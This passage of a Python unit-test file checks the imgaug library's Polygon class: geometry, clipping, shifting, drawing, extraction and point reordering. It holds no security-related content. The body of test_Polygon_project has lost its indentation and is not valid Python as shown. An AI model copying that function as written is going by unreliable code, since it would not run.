        ([(0, 0)], 0.0),                          # single point
    ]
    for exterior, expected_height in cases:
        poly = ia.Polygon(exterior)
        assert np.allclose(poly.height, expected_height, atol=1e-8, rtol=0)
def test_Polygon_width():
    """Polygon.width must be the horizontal extent (max x - min x)."""
    cases = [
        ([(0, 0), (1, 0), (1, 1), (0, 1)], 1.0),
        ([(0, 0), (2, 0), (2, 1), (0, 1)], 2.0),
        ([(0, 0), (1, 1), (0, 1)], 1.0),
        ([(0, 0), (1, 1)], 1.0),
        ([(0, 0)], 0.0),  # single point => zero width
    ]
    for exterior, expected in cases:
        assert np.allclose(ia.Polygon(exterior).width, expected, atol=1e-8, rtol=0)
def test_Polygon_project():
poly = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
poly_proj = poly.project((1, 1), (1, 1))
assert poly_proj.exterior.dtype.type == np.float32
assert poly_proj.exterior.shape == (4, 2)
assert np.allclose(
poly_proj.exterior,
np.float32([
[0, 0],
[1, 0],
[1, 1],
[0, 1]
])
)
poly = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
poly_proj = poly.project((1, 1), (2, 2))
assert poly_proj.exterior.dtype.type == np.float32
assert poly_proj.exterior.shape == (4, 2)
assert np.allclose(
poly_proj.exterior,
np.float32([
[0, 0],
[2, 0],
[2, 2],
[0, 2]
])
)
poly = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
poly_proj = poly.project((1, 1), (2, 1))
assert poly_proj.exterior.dtype.type == np.float32
assert poly_proj.exterior.shape == (4, 2)
assert np.allclose(
poly_proj.exterior,
np.float32([
[0, 0],
[1, 0],
[1, 2],
[0, 2]
])
)
poly = ia.Polygon([])
poly_proj = poly.project((1, 1), (2, 2))
assert poly_proj.exterior.dtype.type == np.float32
assert poly_proj.exterior.shape == (0, 2)
def test_Polygon_find_closest_point_idx():
    """find_closest_point_index must return the nearest corner (and distance)."""
    square = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
    # index-only queries
    index_queries = [
        ((0, 0), 0),
        ((1, 0), 1),
        ((1.0001, -0.001), 1),  # slightly outside, still nearest to corner 1
        ((0.2, 0.2), 0),
    ]
    for (qx, qy), expected_index in index_queries:
        assert square.find_closest_point_index(x=qx, y=qy) == expected_index
    # queries with return_distance=True additionally yield the euclidean distance
    idx, dist = square.find_closest_point_index(x=0, y=0, return_distance=True)
    assert idx == 0
    assert np.allclose(dist, 0.0)
    idx, dist = square.find_closest_point_index(x=0.1, y=0.15, return_distance=True)
    assert idx == 0
    assert np.allclose(dist, np.sqrt((0.1**2) + (0.15**2)))
    idx, dist = square.find_closest_point_index(x=0.9, y=0.15, return_distance=True)
    assert idx == 1
    assert np.allclose(dist, np.sqrt(((1.0-0.9)**2) + (0.15**2)))
def test_Polygon__compute_inside_image_point_mask():
    """_compute_inside_image_point_mask must flag per-point image containment."""
    # all corners strictly inside a 1x1 image
    polygon = ia.Polygon([(0, 0), (0.999, 0), (0.999, 0.999), (0, 0.999)])
    mask = polygon._compute_inside_image_point_mask((1, 1, 3))
    assert np.array_equal(mask, np.array([True, True, True, True], dtype=bool))
    # points at coordinate 1.0 lie outside a 1x1 image; the image may be
    # given as an (H, W, C) tuple, an (H, W) tuple or an ndarray
    for image in [(1, 1, 3), (1, 1), np.zeros((1, 1, 3), dtype=np.uint8)]:
        polygon = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
        mask = polygon._compute_inside_image_point_mask(image)
        assert np.array_equal(mask, np.array([True, False, False, False], dtype=bool))
def test_Polygon_is_fully_within_image():
    """is_fully_within_image for inside, border-touching and far-away polygons."""
    # the image may be given as shape tuple (with/without channels) or ndarray
    for image in [(1, 1, 3), (1, 1), np.zeros((1, 1, 3), dtype=np.uint8)]:
        # strictly inside the 1x1 plane
        polygon = ia.Polygon([(0, 0), (0.999, 0), (0.999, 0.999), (0, 0.999)])
        assert polygon.is_fully_within_image(image)
        # corners at coordinate 1.0 are already outside
        polygon = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
        assert not polygon.is_fully_within_image(image)
    # far away from the image plane
    polygon = ia.Polygon([(100, 100), (101, 100), (101, 101), (100, 101)])
    assert not polygon.is_fully_within_image((1, 1, 3))
def test_Polygon_is_partly_within_image():
    """is_partly_within_image for inside, overlapping and fully-outside polygons."""
    # the image may be given as shape tuple (with/without channels) or ndarray
    for image in [(1, 1, 3), (1, 1), np.zeros((1, 1, 3), dtype=np.uint8)]:
        # strictly inside the 1x1 plane
        polygon = ia.Polygon([(0, 0), (0.999, 0), (0.999, 0.999), (0, 0.999)])
        assert polygon.is_partly_within_image(image)
        # touching coordinate 1.0 still overlaps the image
        polygon = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
        assert polygon.is_partly_within_image(image)
        # far away => no overlap at all
        polygon = ia.Polygon([(100, 100), (101, 100), (101, 101), (100, 101)])
        assert not polygon.is_partly_within_image(image)
def test_Polygon_is_out_of_image():
    """Check is_out_of_image() for all partly/fully flag combinations."""
    # polygon strictly inside the image: never out of image, whatever the flags
    for shape in [(1, 1, 3), (1, 1), np.zeros((1, 1, 3), dtype=np.uint8)]:
        poly = ia.Polygon([(0, 0), (0.999, 0), (0.999, 0.999), (0, 0.999)])
        assert not poly.is_out_of_image(shape, partly=False, fully=False)
        assert not poly.is_out_of_image(shape, partly=True, fully=False)
        assert not poly.is_out_of_image(shape, partly=False, fully=True)
        assert not poly.is_out_of_image(shape, partly=True, fully=True)
    # polygon touching coordinate 1.0: counts as partly (but not fully) outside
    poly = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
    shape = np.zeros((1, 1, 3), dtype=np.uint8)
    assert not poly.is_out_of_image(shape, partly=False, fully=False)
    assert poly.is_out_of_image(shape, partly=True, fully=False)
    assert not poly.is_out_of_image(shape, partly=False, fully=True)
    assert poly.is_out_of_image(shape, partly=True, fully=True)
    # polygon far away from the image plane: counts as fully (not partly) outside
    poly = ia.Polygon([(100, 100), (101, 100), (101, 101), (100, 101)])
    shape = (1, 1, 3)
    assert not poly.is_out_of_image(shape, partly=False, fully=False)
    assert not poly.is_out_of_image(shape, partly=True, fully=False)
    assert poly.is_out_of_image(shape, partly=False, fully=True)
    assert poly.is_out_of_image(shape, partly=True, fully=True)
    # an empty polygon cannot be classified and must raise
    poly = ia.Polygon([])
    got_exception = False
    try:
        poly.is_out_of_image((1, 1, 3))
    except Exception as exc:
        assert "Cannot determine whether the polygon is inside the image" in str(exc)
        got_exception = True
    assert got_exception
def test_Polygon_cut_out_of_image():
    """cut_out_of_image() must behave like clip_out_of_image() and warn
    that it is deprecated (one warning per call)."""
    with warnings.catch_warnings(record=True) as caught_warnings:
        # Cause all warnings to always be triggered.
        warnings.simplefilter("always")
        # Trigger a warning.
        _test_Polygon_cut_clip(lambda poly, image: poly.cut_out_of_image(image))
        # Verify
        # get multiple warnings here, one for each function call
        assert all([
            "is deprecated" in str(msg.message)
            for msg in caught_warnings])
def test_Polygon_clip_out_of_image():
    """clip_out_of_image() must satisfy the shared cut/clip expectations."""
    def _clip(poly, image):
        return poly.clip_out_of_image(image)
    _test_Polygon_cut_clip(_clip)
def _test_Polygon_cut_clip(func):
    """Shared checks for Polygon.cut_out_of_image()/clip_out_of_image().

    ``func(poly, image)`` must clip ``poly`` against the image plane and
    return a list of polygons (possibly empty, possibly more than one).
    """
    # poly inside image: clipping is a no-op, label is preserved
    poly = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)], label=None)
    image = np.zeros((1, 1, 3), dtype=np.uint8)
    multipoly_clipped = func(poly, image)
    assert isinstance(multipoly_clipped, list)
    assert len(multipoly_clipped) == 1
    assert multipoly_clipped[0].exterior_almost_equals(poly.exterior)
    assert multipoly_clipped[0].label is None
    # square poly shifted by x=0.5, y=0.5 => half out of image
    poly = ia.Polygon([(0.5, 0.5), (1.5, 0.5), (1.5, 1.5), (0.5, 1.5)], label="test")
    image = np.zeros((1, 1, 3), dtype=np.uint8)
    multipoly_clipped = func(poly, image)
    assert isinstance(multipoly_clipped, list)
    assert len(multipoly_clipped) == 1
    assert multipoly_clipped[0].exterior_almost_equals(np.float32([
        [0.5, 0.5],
        [1.0, 0.5],
        [1.0, 1.0],
        [0.5, 1.0]
    ]))
    assert multipoly_clipped[0].label == "test"
    # non-square poly, with one rectangle on the left side of the image and one on the right side,
    # both sides are connected by a thin strip below the image
    # after clipping it should become two rectangles
    poly = ia.Polygon([(-0.1, 0.0), (0.4, 0.0), (0.4, 1.1), (0.6, 1.1), (0.6, 0.0), (1.1, 0.0),
                       (1.1, 1.2), (-0.1, 1.2)],
                      label="test")
    image = np.zeros((1, 1, 3), dtype=np.uint8)
    multipoly_clipped = func(poly, image)
    assert isinstance(multipoly_clipped, list)
    assert len(multipoly_clipped) == 2
    assert multipoly_clipped[0].exterior_almost_equals(np.float32([
        [0.0, 0.0],
        [0.4, 0.0],
        [0.4, 1.0],
        [0.0, 1.0]
    ]))
    assert multipoly_clipped[0].label == "test"
    assert multipoly_clipped[1].exterior_almost_equals(np.float32([
        [0.6, 0.0],
        [1.0, 0.0],
        [1.0, 1.0],
        [0.6, 1.0]
    ]))
    # BUGFIX: this previously re-checked multipoly_clipped[0].label; the
    # label of the SECOND clipped polygon must be verified as well.
    assert multipoly_clipped[1].label == "test"
    # poly outside of image: clipping removes it entirely
    poly = ia.Polygon([(10.0, 10.0)])
    multipoly_clipped = func(poly, (5, 5, 3))
    assert isinstance(multipoly_clipped, list)
    assert len(multipoly_clipped) == 0
def test_Polygon_shift():
    """Check Polygon.shift(): top/bottom/left/right offsets move the
    exterior without modifying the original polygon in place."""
    poly = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)], label="test")
    # make sure that shift does not change poly inplace
    poly_shifted = poly.shift(top=1)
    assert np.allclose(poly.exterior, np.float32([
        [0, 0],
        [1, 0],
        [1, 1],
        [0, 1]
    ]))
    assert np.allclose(poly_shifted.exterior, np.float32([
        [0, 1],
        [1, 1],
        [1, 2],
        [0, 2]
    ]))
    for v in [1, 0, -1, 0.5]:
        # top/bottom
        # shift(top=v) adds v to all y-coordinates (moves away from the top edge)
        poly_shifted = poly.shift(top=v)
        assert np.allclose(poly_shifted.exterior, np.float32([
            [0, 0 + v],
            [1, 0 + v],
            [1, 1 + v],
            [0, 1 + v]
        ]))
        assert poly_shifted.label == "test"
        # shift(bottom=v) subtracts v from all y-coordinates
        poly_shifted = poly.shift(bottom=v)
        assert np.allclose(poly_shifted.exterior, np.float32([
            [0, 0 - v],
            [1, 0 - v],
            [1, 1 - v],
            [0, 1 - v]
        ]))
        assert poly_shifted.label == "test"
        # top and bottom offsets accumulate
        poly_shifted = poly.shift(top=v, bottom=-v)
        assert np.allclose(poly_shifted.exterior, np.float32([
            [0, 0 + 2*v],
            [1, 0 + 2*v],
            [1, 1 + 2*v],
            [0, 1 + 2*v]
        ]))
        assert poly_shifted.label == "test"
        # left/right
        # shift(left=v) adds v to all x-coordinates
        poly_shifted = poly.shift(left=v)
        assert np.allclose(poly_shifted.exterior, np.float32([
            [0 + v, 0],
            [1 + v, 0],
            [1 + v, 1],
            [0 + v, 1]
        ]))
        assert poly_shifted.label == "test"
        # shift(right=v) subtracts v from all x-coordinates
        poly_shifted = poly.shift(right=v)
        assert np.allclose(poly_shifted.exterior, np.float32([
            [0 - v, 0],
            [1 - v, 0],
            [1 - v, 1],
            [0 - v, 1]
        ]))
        assert poly_shifted.label == "test"
        # left and right offsets accumulate
        poly_shifted = poly.shift(left=v, right=-v)
        assert np.allclose(poly_shifted.exterior, np.float32([
            [0 + 2 * v, 0],
            [1 + 2 * v, 0],
            [1 + 2 * v, 1],
            [0 + 2 * v, 1]
        ]))
        assert poly_shifted.label == "test"
def test_Polygon_draw_on_image():
    """Check Polygon.draw_on_image(): fill/perimeter colors, alpha blending,
    float input images, partially/fully out-of-image polygons and the
    raise_if_out_of_image flag."""
    # gradient image so alpha blending against non-constant pixels is visible
    image = np.tile(np.arange(100).reshape(10, 10, 1), (1, 1, 3)).astype(np.uint8)
    # simple drawing of square
    poly = ia.Polygon([(2, 2), (8, 2), (8, 8), (2, 8)])
    image_poly = poly.draw_on_image(image,
                                    color=[32, 128, 32],
                                    color_fill=[32, 128, 32],
                                    color_perimeter=[0, 255, 0],
                                    color_points=[0, 255, 0],
                                    alpha=1.0,
                                    alpha_fill=1.0,
                                    alpha_perimeter=1.0,
                                    alpha_points=0.0,
                                    raise_if_out_of_image=False)
    assert image_poly.dtype.type == np.uint8
    assert image_poly.shape == (10, 10, 3)
    assert np.sum(image) == 3 * np.sum(np.arange(100))  # draw did not change original image (copy=True)
    for c_idx, value in enumerate([0, 255, 0]):
        assert np.all(image_poly[2:9, 2:3, c_idx] == np.zeros((7, 1), dtype=np.uint8) + value)  # left boundary
        assert np.all(image_poly[2:9, 8:9, c_idx] == np.zeros((7, 1), dtype=np.uint8) + value)  # right boundary
        assert np.all(image_poly[2:3, 2:9, c_idx] == np.zeros((1, 7), dtype=np.uint8) + value)  # top boundary
        assert np.all(image_poly[8:9, 2:9, c_idx] == np.zeros((1, 7), dtype=np.uint8) + value)  # bottom boundary
    expected = np.tile(np.uint8([32, 128, 32]).reshape((1, 1, 3)), (5, 5, 1))
    assert np.all(image_poly[3:8, 3:8, :] == expected)
    # simple drawing of square, use only "color" arg
    # (fill expected as `color`, perimeter as half of `color` per the asserts below)
    poly = ia.Polygon([(2, 2), (8, 2), (8, 8), (2, 8)])
    image_poly = poly.draw_on_image(image,
                                    color=[0, 255, 0],
                                    alpha=1.0,
                                    alpha_fill=1.0,
                                    alpha_perimeter=1.0,
                                    alpha_points=0.0,
                                    raise_if_out_of_image=False)
    assert image_poly.dtype.type == np.uint8
    assert image_poly.shape == (10, 10, 3)
    assert np.sum(image) == 3 * np.sum(np.arange(100))  # draw did not change original image (copy=True)
    for c_idx, value in enumerate([0, 0.5*255, 0]):
        value = int(value)
        assert np.all(image_poly[2:9, 2:3, c_idx] == np.zeros((7, 1), dtype=np.uint8) + value)  # left boundary
        assert np.all(image_poly[2:9, 8:9, c_idx] == np.zeros((7, 1), dtype=np.uint8) + value)  # right boundary
        assert np.all(image_poly[2:3, 2:9, c_idx] == np.zeros((1, 7), dtype=np.uint8) + value)  # top boundary
        assert np.all(image_poly[8:9, 2:9, c_idx] == np.zeros((1, 7), dtype=np.uint8) + value)  # bottom boundary
    expected = np.tile(np.uint8([0, 255, 0]).reshape((1, 1, 3)), (5, 5, 1))
    assert np.all(image_poly[3:8, 3:8, :] == expected)
    # simple drawing of square with float32 input
    poly = ia.Polygon([(2, 2), (8, 2), (8, 8), (2, 8)])
    image_poly = poly.draw_on_image(image.astype(np.float32),
                                    color=[32, 128, 32],
                                    color_fill=[32, 128, 32],
                                    color_perimeter=[0, 255, 0],
                                    color_points=[0, 255, 0],
                                    alpha=1.0,
                                    alpha_fill=1.0,
                                    alpha_perimeter=1.0,
                                    alpha_points=0.0,
                                    raise_if_out_of_image=False)
    assert image_poly.dtype.type == np.float32  # input dtype is preserved
    assert image_poly.shape == (10, 10, 3)
    for c_idx, value in enumerate([0, 255, 0]):
        assert np.allclose(image_poly[2:9, 2:3, c_idx], np.zeros((7, 1), dtype=np.float32) + value)  # left boundary
        assert np.allclose(image_poly[2:9, 8:9, c_idx], np.zeros((7, 1), dtype=np.float32) + value)  # right boundary
        assert np.allclose(image_poly[2:3, 2:9, c_idx], np.zeros((1, 7), dtype=np.float32) + value)  # top boundary
        assert np.allclose(image_poly[8:9, 2:9, c_idx], np.zeros((1, 7), dtype=np.float32) + value)  # bottom boundary
    expected = np.tile(np.float32([32, 128, 32]).reshape((1, 1, 3)), (5, 5, 1))
    assert np.allclose(image_poly[3:8, 3:8, :], expected)
    # drawing of poly that is half out of image
    poly = ia.Polygon([(2, 2+5), (8, 2+5), (8, 8+5), (2, 8+5)])
    image_poly = poly.draw_on_image(image,
                                    color=[32, 128, 32],
                                    color_fill=[32, 128, 32],
                                    color_perimeter=[0, 255, 0],
                                    color_points=[0, 255, 0],
                                    alpha=1.0,
                                    alpha_fill=1.0,
                                    alpha_perimeter=1.0,
                                    alpha_points=0.0,
                                    raise_if_out_of_image=False)
    assert image_poly.dtype.type == np.uint8
    assert image_poly.shape == (10, 10, 3)
    assert np.sum(image) == 3 * np.sum(np.arange(100))  # draw did not change original image (copy=True)
    for c_idx, value in enumerate([0, 255, 0]):
        assert np.all(image_poly[2+5:, 2:3, c_idx] == np.zeros((3, 1), dtype=np.uint8) + value)  # left boundary
        assert np.all(image_poly[2+5:, 8:9, c_idx] == np.zeros((3, 1), dtype=np.uint8) + value)  # right boundary
        assert np.all(image_poly[2+5:3+5, 2:9, c_idx] == np.zeros((1, 7), dtype=np.uint8) + value)  # top boundary
    expected = np.tile(np.uint8([32, 128, 32]).reshape((1, 1, 3)), (2, 5, 1))
    assert np.all(image_poly[3+5:, 3:8, :] == expected)
    # drawing of poly that is half out of image, with raise_if_out_of_image=True
    poly = ia.Polygon([(2, 2+5), (8, 2+5), (8, 8+5), (0, 8+5)])
    got_exception = False
    try:
        _ = poly.draw_on_image(image,
                               color=[32, 128, 32],
                               color_fill=[32, 128, 32],
                               color_perimeter=[0, 255, 0],
                               color_points=[0, 255, 0],
                               alpha=1.0,
                               alpha_fill=1.0,
                               alpha_perimeter=1.0,
                               alpha_points=0.0,
                               raise_if_out_of_image=True)
    except Exception as exc:
        assert "Cannot draw polygon" in str(exc)
        got_exception = True
    assert not got_exception  # only polygons fully outside of the image plane lead to exceptions
    # drawing of poly that is fully out of image
    poly = ia.Polygon([(100, 100), (100+10, 100), (100+10, 100+10), (100, 100+10)])
    image_poly = poly.draw_on_image(image,
                                    color=[32, 128, 32],
                                    color_fill=[32, 128, 32],
                                    color_perimeter=[0, 255, 0],
                                    color_points=[0, 255, 0],
                                    alpha=1.0,
                                    alpha_fill=1.0,
                                    alpha_perimeter=1.0,
                                    alpha_points=0.0,
                                    raise_if_out_of_image=False)
    assert np.array_equal(image_poly, image)  # nothing is drawn
    # drawing of poly that is fully out of image, with raise_if_out_of_image=True
    poly = ia.Polygon([(100, 100), (100+10, 100), (100+10, 100+10), (100, 100+10)])
    got_exception = False
    try:
        _ = poly.draw_on_image(image,
                               color=[32, 128, 32],
                               color_fill=[32, 128, 32],
                               color_perimeter=[0, 255, 0],
                               color_points=[0, 255, 0],
                               alpha=1.0,
                               alpha_fill=1.0,
                               alpha_perimeter=1.0,
                               alpha_points=0.0,
                               raise_if_out_of_image=True)
    except Exception as exc:
        assert "Cannot draw polygon" in str(exc)
        got_exception = True
    assert got_exception
    # face invisible via alpha
    poly = ia.Polygon([(2, 2), (8, 2), (8, 8), (2, 8)])
    image_poly = poly.draw_on_image(image,
                                    color=[32, 128, 32],
                                    color_fill=[32, 128, 32],
                                    color_perimeter=[0, 255, 0],
                                    color_points=[0, 255, 0],
                                    alpha=1.0,
                                    alpha_fill=0.0,
                                    alpha_perimeter=1.0,
                                    alpha_points=0.0,
                                    raise_if_out_of_image=False)
    assert image_poly.dtype.type == np.uint8
    assert image_poly.shape == (10, 10, 3)
    assert np.sum(image) == 3 * np.sum(np.arange(100))  # draw did not change original image (copy=True)
    for c_idx, value in enumerate([0, 255, 0]):
        assert np.all(image_poly[2:9, 2:3, c_idx] == np.zeros((7, 1), dtype=np.uint8) + value)  # left boundary
    assert np.all(image_poly[3:8, 3:8, :] == image[3:8, 3:8, :])  # interior untouched
    # boundary invisible via alpha
    poly = ia.Polygon([(2, 2), (8, 2), (8, 8), (2, 8)])
    image_poly = poly.draw_on_image(image,
                                    color=[32, 128, 32],
                                    color_fill=[32, 128, 32],
                                    color_perimeter=[0, 255, 0],
                                    color_points=[0, 255, 0],
                                    alpha=1.0,
                                    alpha_fill=1.0,
                                    alpha_perimeter=0.0,
                                    alpha_points=0.0,
                                    raise_if_out_of_image=False)
    assert image_poly.dtype.type == np.uint8
    assert image_poly.shape == (10, 10, 3)
    assert np.sum(image) == 3 * np.sum(np.arange(100))  # draw did not change original image (copy=True)
    expected = np.tile(np.uint8([32, 128, 32]).reshape((1, 1, 3)), (6, 6, 1))
    assert np.all(image_poly[2:8, 2:8, :] == expected)
    # alpha=0.8
    # (per the asserts below: perimeter blends at 0.8, fill at 0.8 * 0.5)
    poly = ia.Polygon([(2, 2), (8, 2), (8, 8), (2, 8)])
    image_poly = poly.draw_on_image(image,
                                    color=[32, 128, 32],
                                    color_fill=[32, 128, 32],
                                    color_perimeter=[0, 255, 0],
                                    color_points=[0, 255, 0],
                                    alpha=0.8,
                                    alpha_points=0.0,
                                    raise_if_out_of_image=False)
    assert image_poly.dtype.type == np.uint8
    assert image_poly.shape == (10, 10, 3)
    for c_idx, value in enumerate([0, 255, 0]):
        assert np.all(
            image_poly[2:9, 8:9, c_idx] ==
            (
                (1-0.8)*image[2:9, 8:9, c_idx]
                + np.full((7, 1), 0.8*value, dtype=np.float32)
            ).astype(np.uint8)
        )  # right boundary
    expected = (0.8 * 0.5) * np.tile(np.uint8([32, 128, 32]).reshape((1, 1, 3)), (5, 5, 1)) \
        + (1 - (0.8 * 0.5)) * image[3:8, 3:8, :]
    assert np.all(image_poly[3:8, 3:8, :] == expected.astype(np.uint8))
    # alpha of fill and perimeter 0.5
    poly = ia.Polygon([(2, 2), (8, 2), (8, 8), (2, 8)])
    image_poly = poly.draw_on_image(image,
                                    color=[32, 128, 32],
                                    color_fill=[32, 128, 32],
                                    color_perimeter=[0, 255, 0],
                                    color_points=[0, 255, 0],
                                    alpha=1.0,
                                    alpha_fill=0.5,
                                    alpha_perimeter=0.5,
                                    alpha_points=0.0,
                                    raise_if_out_of_image=False)
    assert image_poly.dtype.type == np.uint8
    assert image_poly.shape == (10, 10, 3)
    for c_idx, value in enumerate([0, 255, 0]):
        assert np.all(
            image_poly[2:9, 8:9, c_idx] ==
            (
                0.5*image[2:9, 8:9, c_idx]
                + np.full((7, 1), 0.5*value, dtype=np.float32)
            ).astype(np.uint8)
        )  # right boundary
    expected = 0.5 * np.tile(np.uint8([32, 128, 32]).reshape((1, 1, 3)), (5, 5, 1)) \
        + 0.5 * image[3:8, 3:8, :]
    assert np.all(image_poly[3:8, 3:8, :] == expected.astype(np.uint8))
    # copy=False
    # test deactivated as the function currently does not offer a copy argument
    """
    image_cp = np.copy(image)
    poly = ia.Polygon([(2, 2), (8, 2), (8, 8), (2, 8)])
    image_poly = poly.draw_on_image(image_cp,
                                    color_face=[32, 128, 32], color_boundary=[0, 255, 0],
                                    alpha_face=1.0, alpha_boundary=1.0,
                                    raise_if_out_of_image=False)
    assert image_poly.dtype.type == np.uint8
    assert image_poly.shape == (10, 10, 3)
    assert np.all(image_cp == image_poly)
    assert not np.all(image_cp == image)
    for c_idx, value in enumerate([0, 255, 0]):
        assert np.all(image_poly[2:9, 2:3, c_idx] == np.zeros((6, 1, 3), dtype=np.uint8) + value)  # left boundary
        assert np.all(image_cp[2:9, 2:3, c_idx] == np.zeros((6, 1, 3), dtype=np.uint8) + value)  # left boundary
    expected = np.tile(np.uint8([32, 128, 32]).reshape((1, 1, 3)), (5, 5, 1))
    assert np.all(image_poly[3:8, 3:8, :] == expected)
    assert np.all(image_cp[3:8, 3:8, :] == expected)
    """
def test_Polygon_extract_from_image():
    """Check Polygon.extract_from_image(): extraction of the bounding-box
    region with pixels outside the polygon/image zero-filled."""
    # two-channel gradient image so extracted values are position-dependent
    image = np.arange(20*20*2).reshape(20, 20, 2).astype(np.int32)
    # inside image and completely covers it
    poly = ia.Polygon([(0, 0), (10, 0), (10, 10), (0, 10)])
    subimage = poly.extract_from_image(image)
    assert np.array_equal(subimage, image[0:10, 0:10, :])
    # inside image, subpart of it (not all may be extracted)
    poly = ia.Polygon([(1, 1), (9, 1), (9, 9), (1, 9)])
    subimage = poly.extract_from_image(image)
    assert np.array_equal(subimage, image[1:9, 1:9, :])
    # inside image, two image areas that don't belong to the polygon but have to be extracted
    poly = ia.Polygon([(0, 0), (10, 0), (10, 5), (20, 5),
                       (20, 20), (10, 20), (10, 5), (0, 5)])
    subimage = poly.extract_from_image(image)
    expected = np.copy(image)
    expected[:5, 10:, :] = 0  # top right block
    expected[5:, :10, :] = 0  # left bottom block
    assert np.array_equal(subimage, expected)
    # partially out of image
    # (pixels outside the image plane are zero-filled in the extraction)
    poly = ia.Polygon([(-5, 0), (5, 0), (5, 10), (-5, 10)])
    subimage = poly.extract_from_image(image)
    expected = np.zeros((10, 10, 2), dtype=np.int32)
    expected[0:10, 5:10, :] = image[0:10, 0:5, :]
    assert np.array_equal(subimage, expected)
    # fully out of image
    poly = ia.Polygon([(30, 0), (40, 0), (40, 10), (30, 10)])
    subimage = poly.extract_from_image(image)
    expected = np.zeros((10, 10, 2), dtype=np.int32)
    assert np.array_equal(subimage, expected)
    # inside image, subpart of it
    # float coordinates, rounded so that the whole image will be extracted
    poly = ia.Polygon([(0.4, 0.4), (9.6, 0.4), (9.6, 9.6), (0.4, 9.6)])
    subimage = poly.extract_from_image(image)
    assert np.array_equal(subimage, image[0:10, 0:10, :])
    # inside image, subpart of it
    # float coordinates, rounded so that x/y 0<=i<9 will be extracted (instead of 0<=i<10)
    poly = ia.Polygon([(0.5, 0.5), (9.4, 0.5), (9.4, 9.4), (0.5, 9.4)])
    subimage = poly.extract_from_image(image)
    assert np.array_equal(subimage, image[0:9, 0:9, :])
    # inside image, subpart of it
    # float coordinates, rounded so that x/y 1<=i<9 will be extracted (instead of 0<=i<10)
    poly = ia.Polygon([(0.51, 0.51), (9.4, 0.51), (9.4, 9.4), (0.51, 9.4)])
    subimage = poly.extract_from_image(image)
    assert np.array_equal(subimage, image[1:9, 1:9, :])
    # error for invalid polygons
    got_exception = False
    poly = ia.Polygon([(0.51, 0.51), (9.4, 0.51)])
    try:
        _ = poly.extract_from_image(image)
    except Exception as exc:
        assert "Polygon must be made up" in str(exc)
        got_exception = True
    assert got_exception
def test_Polygon_change_first_point_by_coords():
    """Check change_first_point_by_coords(): rotate the exterior so the
    point closest to (x, y) becomes the first point, respecting
    max_distance."""
    poly = ia.Polygon([(0, 0), (1, 0), (1, 1)])
    poly_reordered = poly.change_first_point_by_coords(x=0, y=0)
    assert np.allclose(poly.exterior, poly_reordered.exterior)
    poly = ia.Polygon([(0, 0), (1, 0), (1, 1)])
    poly_reordered = poly.change_first_point_by_coords(x=1, y=0)
    # make sure that it does not reorder inplace
    assert np.allclose(poly.exterior, np.float32([[0, 0], [1, 0], [1, 1]]))
    assert np.allclose(poly_reordered.exterior, np.float32([[1, 0], [1, 1], [0, 0]]))
    poly = ia.Polygon([(0, 0), (1, 0), (1, 1)])
    poly_reordered = poly.change_first_point_by_coords(x=1, y=1)
    assert np.allclose(poly_reordered.exterior, np.float32([[1, 1], [0, 0], [1, 0]]))
    # inaccurate point, but close enough
    poly = ia.Polygon([(0, 0), (1, 0), (1, 1)])
    poly_reordered = poly.change_first_point_by_coords(x=1.0, y=0.01, max_distance=0.1)
    assert np.allclose(poly_reordered.exterior, np.float32([[1, 0], [1, 1], [0, 0]]))
    # inaccurate point, but close enough (infinite max distance)
    poly = ia.Polygon([(0, 0), (1, 0), (1, 1)])
    poly_reordered = poly.change_first_point_by_coords(x=1.0, y=0.01, max_distance=None)
    assert np.allclose(poly_reordered.exterior, np.float32([[1, 0], [1, 1], [0, 0]]))
    # point too far away
    # (closest point is farther than max_distance => must raise)
    poly = ia.Polygon([(0, 0), (1, 0), (1, 1)])
    got_exception = False
    try:
        _ = poly.change_first_point_by_coords(x=1.0, y=0.01, max_distance=0.001)
    except Exception as exc:
        assert "Closest found point " in str(exc)
        got_exception = True
    assert got_exception
    # reorder with two points
    poly = ia.Polygon([(0, 0), (1, 0)])
    poly_reordered = poly.change_first_point_by_coords(x=1, y=0)
    assert np.allclose(poly_reordered.exterior, np.float32([[1, 0], [0, 0]]))
    # reorder with one point
    poly = ia.Polygon([(0, 0)])
    poly_reordered = poly.change_first_point_by_coords(x=0, y=0)
    assert np.allclose(poly_reordered.exterior, np.float32([[0, 0]]))
    # invalid polygon
    # (no points at all => cannot reorder => must raise)
    got_exception = False
    poly = ia.Polygon([])
    try:
        _ = poly.change_first_point_by_coords(x=0, y=0)
    except Exception as exc:
        assert "Cannot reorder polygon points" in str(exc)
        got_exception = True
    assert got_exception
def test_Polygon_change_first_point_by_index():
    """change_first_point_by_index must rotate the exterior, not mutate it."""
    # index 0 keeps the order unchanged
    triangle = ia.Polygon([(0, 0), (1, 0), (1, 1)])
    assert np.allclose(triangle.exterior,
                       triangle.change_first_point_by_index(0).exterior)
    # index 1: order is rotated, the original polygon stays untouched
    triangle = ia.Polygon([(0, 0), (1, 0), (1, 1)])
    rotated = triangle.change_first_point_by_index(1)
    assert np.allclose(triangle.exterior, np.float32([[0, 0], [1, 0], [1, 1]]))
    assert np.allclose(rotated.exterior, np.float32([[1, 0], [1, 1], [0, 0]]))
    # index 2
    rotated = ia.Polygon([(0, 0), (1, 0), (1, 1)]).change_first_point_by_index(2)
    assert np.allclose(rotated.exterior, np.float32([[1, 1], [0, 0], [1, 0]]))
    # two-point polygon
    rotated = ia.Polygon([(0, 0), (1, 0)]).change_first_point_by_index(1)
    assert np.allclose(rotated.exterior, np.float32([[1, 0], [0, 0]]))
    # one-point polygon
    rotated = ia.Polygon([(0, 0)]).change_first_point_by_index(0)
    assert np.allclose(rotated.exterior, np.float32([[0, 0]]))
    # out-of-bounds indices must trigger the implementation's assertion
    invalid_cases = [
        (ia.Polygon([(0, 0), (1, 0), (1, 1)]), 3),
        (ia.Polygon([(0, 0), (1, 0), (1, 1)]), -1),
        (ia.Polygon([(0, 0)]), 1),
        (ia.Polygon([]), 0),
    ]
    for polygon, bad_index in invalid_cases:
